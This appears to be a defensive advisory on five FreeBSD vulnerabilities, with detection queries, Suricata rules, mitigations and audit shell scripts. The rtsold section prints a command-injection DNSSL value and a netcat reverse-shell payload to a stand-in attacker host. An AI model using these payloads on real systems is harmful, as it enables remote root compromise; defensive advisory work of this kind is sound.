Product Overview
| Field | Details |
|---|---|
| Product | FreeBSD Operating System |
| Vendor | FreeBSD Project |
| Affected Components | Jail subsystem, nullfs filesystem, rtsol/rtsold IPv6 configuration service, routing socket kernel module, pf firewall |
| Deployment Environment | Servers, network appliances, cloud infrastructure, virtualization hosts |
| Attack Surface | Local system users, jail tenants, network attackers on the same IPv6 segment |
| Security Impact | Jail escape, command injection with root privileges, kernel crash, denial of service, firewall disruption |
FreeBSD is commonly deployed in environments where strong isolation and network reliability are required. The jail subsystem is widely used for multi-tenant hosting and container-like isolation. Several recently disclosed vulnerabilities affect filesystem mounting, router advertisement handling, kernel routing logic, and firewall packet inspection.
If these issues remain unpatched, a system may be exposed to container escape, remote command execution, kernel panic conditions, or firewall service interruption.
Vulnerability Summary Table
| Vulnerability | CVE | CVSS Score | Severity | Attack Vector | Privileges Required | Exploit Availability |
|---|---|---|---|---|---|---|
| FreeBSD Jail Directory Descriptor Escape | CVE-2025-15576 | 9.8 | Critical | Local / Inter-jail communication | Low | Limited PoC concepts |
| FreeBSD rtsol / rtsold Command Injection | CVE-2025-14558 | 9.0 | Critical | Network | None | Public PoC examples |
| FreeBSD Kernel Stack Buffer Overflow | CVE-2026-3038 | 7.5 | High | Local | Low | No confirmed public exploit |
| FreeBSD Jail nullfs Mount Escape | CVE-2025-15547 | 8.2 | High | Local | Jail privileged user | Research PoC described |
| FreeBSD pf Firewall DoS | CVE-2025-14769 | 7.1 | High | Network | None | No reliable exploit published |
CVE-2025-15576
FreeBSD Jail Directory Descriptor Escape
Vulnerability Description
A flaw was identified in the interaction between FreeBSD jails, nullfs mounts, and Unix domain sockets.
In environments where directories are shared between jails using nullfs, processes are able to exchange file descriptors over Unix sockets. When directory descriptors are transferred, the kernel does not fully enforce the jail root boundary.
Because of this behavior, a process inside a jail may receive a descriptor referencing a directory outside its filesystem root. Once the descriptor is obtained, file operations can be performed relative to that descriptor, effectively bypassing the jail isolation mechanism.
The isolation guarantee provided by jails can therefore be broken, allowing access to the host filesystem.
Affected Components
- FreeBSD jail subsystem
- nullfs filesystem layer
- Unix domain socket descriptor passing
Potential Impact
If exploited successfully:
- Host filesystem directories may become accessible
- Sensitive files such as /etc/master.passwd or system configuration may be read
- Host binaries may be modified
- Privilege escalation from jail user to host administrator may occur
- Multi-tenant hosting environments may experience cross-tenant compromise
Exploitation Scenario
The vulnerability may be triggered when the following conditions are present:
- Multiple jails share a directory through nullfs.
- Communication occurs between processes using Unix domain sockets.
- A directory descriptor referencing an external location is passed to another jail.
Once the descriptor is received, a process can use system calls such as:
- openat()
- fchdir()
These operations allow traversal of directories that should normally be inaccessible from the jail.
Proof-of-Concept Behavior (Educational Use)
A basic PoC would involve:
- Opening a directory descriptor outside the jail.
- Sending the descriptor via sendmsg() using the SCM_RIGHTS mechanism.
- Receiving the descriptor in another jail using recvmsg().
- Using openat() to access files relative to that descriptor.
Example code fragment illustrating descriptor passing:
sendmsg(socket_fd, &msg, 0);
The received descriptor can then be used for filesystem traversal.
Indicators of Compromise
Possible signs of exploitation may include:
- Unexpected file access from jail processes targeting host directories
- Unix socket traffic between jails exchanging file descriptors
- Jail processes interacting with directories not located under the configured jail root
- Unexpected system calls referencing directory descriptors
Log Sources
Detection activities should focus on:
- FreeBSD audit logs
- Kernel security logs
- Process activity monitoring
- Filesystem audit trails
- Container or jail orchestration logs
Detection Rules
Splunk Query
index=freebsd_logs
source="/var/log/audit.log"
("sendmsg" OR "recvmsg")
"SCM_RIGHTS"
| stats count by process, jail_id, user
ElasticSearch Query
process.name:sendmsg OR process.name:recvmsg
AND system.call:SCM_RIGHTS
AND jail.id:*
OSQuery Detection
-- sendmsg() and recvmsg() are system calls, not process names, so a filter on
-- processes.name would never match. Instead, list processes that hold Unix
-- domain sockets (family 1 = AF_UNIX), the channel used to pass descriptors.
-- Assumes the process_open_sockets table is available in the osquery build in use.
SELECT p.pid, p.name, p.path, s.path AS socket_path
FROM processes p
JOIN process_open_sockets s ON p.pid = s.pid
WHERE s.family = 1;
Mitigation
- Avoid sharing directories across multiple jails using nullfs
- Restrict Unix socket communication across jail boundaries
- Apply vendor patches immediately
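As an added example (not from the advisory or the FreeBSD Project), the following POSIX shell function reads a mount table in mount -p format and reports nullfs source directories that are mounted into more than one jail root, which is exactly the configuration the first mitigation above says to avoid. The jail root prefix /jails, the function names and the sample mount table are assumptions constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not FreeBSD tooling: find host directories that are
# nullfs-mounted into more than one jail root. Input lines use the
# `mount -p` (fstab-style) format: source target fstype options dump pass.
# JAIL_ROOT_PREFIX is an assumption about where jail roots live on this host.

JAIL_ROOT_PREFIX="${JAIL_ROOT_PREFIX:-/jails}"

# shared_nullfs_sources: read `mount -p` lines on stdin and print each nullfs
# source directory that appears under two or more distinct jail roots,
# followed by the number of jails it is mounted into.
shared_nullfs_sources() {
    awk -v prefix="$JAIL_ROOT_PREFIX" '
        $3 == "nullfs" && index($2, prefix "/") == 1 {
            # the jail root is the first path component after the prefix
            rest = substr($2, length(prefix) + 2)
            split(rest, parts, "/")
            jail = parts[1]
            key = $1 SUBSEP jail
            if (!(key in seen)) { seen[key] = 1; count[$1]++ }
        }
        END {
            for (src in count) if (count[src] > 1) print src, count[src]
        }
    ' | sort
}

# Constructed sample mount table: /usr/local/share is shared by jails "web"
# and "db", /var/db/pkg is mounted into "web" only, and the last line is a
# nullfs mount outside the jail prefix that must be ignored.
SAMPLE_MOUNTS='/dev/ada0p2 / ufs rw 1 1
/usr/local/share /jails/web/usr/local/share nullfs ro 0 0
/var/db/pkg /jails/web/var/db/pkg nullfs rw 0 0
/usr/local/share /jails/db/usr/local/share nullfs ro 0 0
/usr/ports /usr/jails-unrelated/ports nullfs ro 0 0'

# audit_sample: run the check over the constructed table.
# On a live host the equivalent is:  mount -p | shared_nullfs_sources
audit_sample() {
    printf '%s\n' "$SAMPLE_MOUNTS" | shared_nullfs_sources
}

audit_sample
```

Any directory the check prints is reachable from two jails at once and is a candidate for the descriptor-passing path described above; the usual fix is a separate copy (or a separate nullfs source) per jail.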
Official Patch
FreeBSD security update available through the official advisory.
Patch and upgrade instructions:
https://www.freebsd.org/security/advisories/
CVE-2025-14558
FreeBSD rtsol / rtsold Command Injection
Vulnerability Description
The rtsol utility and rtsold daemon are used in FreeBSD systems to process IPv6 Router Advertisement messages for automatic network configuration.
Router advertisement packets may contain a Domain Name Search List (DNSSL) option. This value is processed by the system and forwarded to the resolvconf shell script responsible for updating DNS resolver configuration.
The DNSSL value is not properly sanitized before being passed to the shell environment. If shell metacharacters are embedded within the DNSSL field, the script interprets them as commands.
Because the daemon runs with elevated privileges, the injected commands execute with root permissions.
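The following POSIX shell validator is an added example, not code from rtsold or from FreeBSD's resolvconf script; it shows the allow-list check that a shell-based resolver updater should apply to DNSSL entries before using them, accepting only syntactically valid DNS names and rejecting anything containing shell metacharacters. The function names and the sample search list are constructed for this illustration.

```shell
#!/bin/sh
# Added example (not FreeBSD code): allow-list validation for DNSSL search
# domains received from router advertisements. Only plain DNS names pass;
# anything else is dropped before it can reach a shell.

# valid_domain: return 0 if $1 is a syntactically valid DNS search domain
# (letters, digits and hyphens; labels of 1-63 characters that neither start
# nor end with a hyphen; at most 253 characters; one trailing dot tolerated),
# otherwise return 1.
valid_domain() {
    name="${1%.}"
    [ -n "$name" ] && [ "${#name}" -le 253 ] || return 1
    printf '%s' "$name" | grep -Eq \
        '^([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
}

# safe_search_list: print only the entries of a whitespace-separated DNSSL
# list that pass valid_domain; return 1 if anything was dropped so the caller
# can log the rejected advertisement.
safe_search_list() {
    dropped=0
    out=""
    set -f   # no pathname expansion while splitting attacker-controlled text
    for d in $1; do
        if valid_domain "$d"; then
            out="${out:+$out }$d"
        else
            dropped=1
        fi
    done
    set +f
    printf '%s\n' "$out"
    return $dropped
}

# Constructed sample: a normal list followed by one containing the
# metacharacter sequence from the advisory; the second entry is dropped.
safe_search_list 'example.com corp.example'
safe_search_list 'example.com $(touch /tmp/compromised) corp.example' || echo 'rejected entries present'
```

Because the rejected strings are held in shell variables and only ever compared or printed, never evaluated, the check itself cannot be made to execute them; the point is that resolver configuration should be built from this filtered list rather than from the raw option value.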
Impact
Successful exploitation may lead to:
- Remote command execution
- Reverse shell installation
- Persistence mechanisms
- Complete system compromise
Exploitation Method
An attacker located on the same IPv6 network sends a crafted router advertisement containing a malicious DNSSL value.
Example malicious DNSSL entry:
$(touch /tmp/compromised)
When the system processes the advertisement, the command embedded within the DNSSL field is executed by the shell.
Reverse Shell Payload (Educational)
$(nc attacker_ip 4444 -e /bin/sh)
When processed by resolvconf, a shell connection would be established back to the attacker.
Indicators of Compromise
- Unexpected files created in temporary directories
- Suspicious outbound connections initiated by rtsold
- Execution of shell commands during router advertisement processing
- DNS configuration changes triggered by abnormal router advertisements
Log Sources
Monitoring should include:
- System daemon logs
- Network monitoring logs
- IPv6 router advertisement capture
- Process execution monitoring
Detection Rules
Suricata Detection
alert icmpv6 any any -> any any
(msg:"FreeBSD rtsold DNSSL command injection attempt";
itype:134; content:"$("; sid:10014558; rev:1;)
Splunk Query
index=syslog
process="rtsold"
("$(" OR ";")
| stats count by host, process
Elastic Query
process.name:rtsold AND command_line:("$(" OR ";")
Mitigation
- Disable IPv6 router advertisements if not required
- Use network segmentation
- Restrict rogue router advertisements using network security controls
- Apply official FreeBSD patch
Official Patch
Upgrade instructions and patched versions are available through:
https://www.freebsd.org/security/advisories
CVE-2026-3038
FreeBSD Kernel Routing Socket Stack Overflow
Vulnerability Description
A stack buffer overflow was discovered in the kernel routing socket subsystem. The vulnerability occurs within the function responsible for preparing routing messages.
Improper validation of routing message sizes allows data to be written beyond the intended buffer boundaries. This corrupts the kernel stack and may trigger the stack canary protection mechanism.
Once the canary integrity check fails, the kernel halts execution to prevent further corruption.
Impact
- Kernel panic
- System crash
- Service disruption
- Potential memory corruption
Exploitation Conditions
A local user capable of interacting with routing sockets may craft malformed routing messages designed to overflow the buffer.
Example affected routine:
rtsock_msg_buffer()
Repeated exploitation attempts could repeatedly crash the system, causing denial of service.
Indicators
- Kernel panic events referencing routing sockets
- Unexpected crashes following routing message processing
- Stack protector failures in kernel logs
Log Sources
Primary detection sources:
- /var/log/messages
- dmesg
- kernel panic dump files
Detection Rules
Splunk Query
index=kernel_logs
("stack protector" OR "kernel panic")
("rtsock" OR "routing socket")
Elastic Query
message:"kernel panic" AND message:"rtsock"
Official Patch
Upgrade instructions:
https://www.freebsd.org/security/advisories
CVE-2025-15547
FreeBSD nullfs Jail Mount Escape
Vulnerability Description
This vulnerability affects the interaction between jail mount privileges and nullfs.
If a privileged user inside a jail has permission to mount filesystems, nullfs mounts may be created that reference directories outside the jail root. Because nullfs mirrors existing directories, it may expose host filesystem paths.
Improper validation allows traversal outside the intended jail environment.
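As an added example (not from the advisory or from FreeBSD's own tools), the following POSIX shell function reads the name=value output of jls -n and lists the running jails whose parameters let a jail-privileged user create nullfs mounts at all, which is the precondition for this issue. The function name and the sample jail list are constructed for the demonstration; the parameter semantics follow jail(8), where allow.mount.nullfs is only effective together with allow.mount and an enforce_statfs value below 2.

```shell
#!/bin/sh
# Added example, not FreeBSD tooling: report jails whose parameters permit
# nullfs mounts from inside the jail. Input is `jls -n` output, one jail per
# line as space-separated name=value pairs. Per jail(8), allow.mount.nullfs
# only takes effect when allow.mount=1 and enforce_statfs is below 2, so all
# three parameters are checked.

# jails_allowing_nullfs: read `jls -n` lines on stdin; print "jid name path"
# for every jail that can mount nullfs from inside.
jails_allowing_nullfs() {
    awk '
        {
            split("", p)
            for (i = 1; i <= NF; i++) {
                eq = index($i, "=")
                if (eq > 0) p[substr($i, 1, eq - 1)] = substr($i, eq + 1)
            }
            if (p["allow.mount"] + 0 == 1 &&
                p["allow.mount.nullfs"] + 0 == 1 &&
                p["enforce_statfs"] != "" && p["enforce_statfs"] + 0 < 2)
                print p["jid"], p["name"], p["path"]
        }
    '
}

# Constructed sample: only jail "build" is effectively allowed nullfs mounts;
# "db" has the allow flags but enforce_statfs=2 disables them.
SAMPLE_JLS='jid=1 name=web path=/jails/web allow.mount=0 allow.mount.nullfs=0 enforce_statfs=2
jid=2 name=build path=/jails/build allow.mount=1 allow.mount.nullfs=1 enforce_statfs=1
jid=3 name=db path=/jails/db allow.mount=1 allow.mount.nullfs=1 enforce_statfs=2'

# jails_sample: run the check over the constructed list.
# On a live host the equivalent is:  jls -n | jails_allowing_nullfs
jails_sample() {
    printf '%s\n' "$SAMPLE_JLS" | jails_allowing_nullfs
}

jails_sample
```

Jails that appear in the output should either lose allow.mount.nullfs (the default) or be confirmed as patched; the same input can be re-run after changing jail.conf to verify the parameters took effect.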
Impact
- Jail escape
- Host filesystem access
- System file modification
- Privilege escalation
Indicators
- Nullfs mount operations initiated from jail environments
- Mount targets referencing host directories
- Unexpected filesystem visibility inside jails
Detection Rules
Splunk Query
index=syslog
"mount" AND "nullfs"
| stats count by host,user
OSQuery
SELECT *
FROM mounts
WHERE type='nullfs';
Official Patch
https://www.freebsd.org/security/advisories
CVE-2025-14769
FreeBSD pf Firewall NULL Pointer Dereference
Vulnerability Description
The FreeBSD pf firewall packet inspection engine contains a flaw in its TCP packet modification logic. When handling packets with specific MSS manipulation parameters using the tcp-setmss option, a pointer may remain uninitialized under certain packet conditions.
If the firewall attempts to dereference the pointer, a kernel crash occurs.
Impact
- Firewall crash
- Kernel panic
- Denial of service
- Temporary network outage
Exploitation Scenario
A remote attacker sends specially crafted TCP packets containing abnormal MSS values. When the firewall attempts to process the packet using tcp-setmss rules, the invalid pointer condition is triggered.
Indicators
- pf firewall crash events
- kernel panic messages referencing pf
- network service disruption during packet inspection
Log Sources
Monitoring sources include:
- firewall logs
- kernel logs
- network monitoring systems
- intrusion detection alerts
Detection Rules
Suricata Rule
alert tcp any any -> any any
(msg:"Potential FreeBSD pf tcp-setmss crash attempt";
flow:stateless;
dsize:>1500;
sid:10014769;)
Splunk Query
index=firewall_logs
("pf:" AND "panic")
Official Patch
Security updates are available through the FreeBSD advisory portal:
https://www.freebsd.org/security/advisories
Recommended Security Actions
To reduce exposure to these vulnerabilities:
- Apply FreeBSD security updates immediately
- Limit nullfs mounts inside jail environments
- Disable unnecessary IPv6 router advertisement handling
- Monitor kernel logs for abnormal crashes
- Implement intrusion detection for suspicious network packets
- Audit filesystem mounts and jail configurations regularly
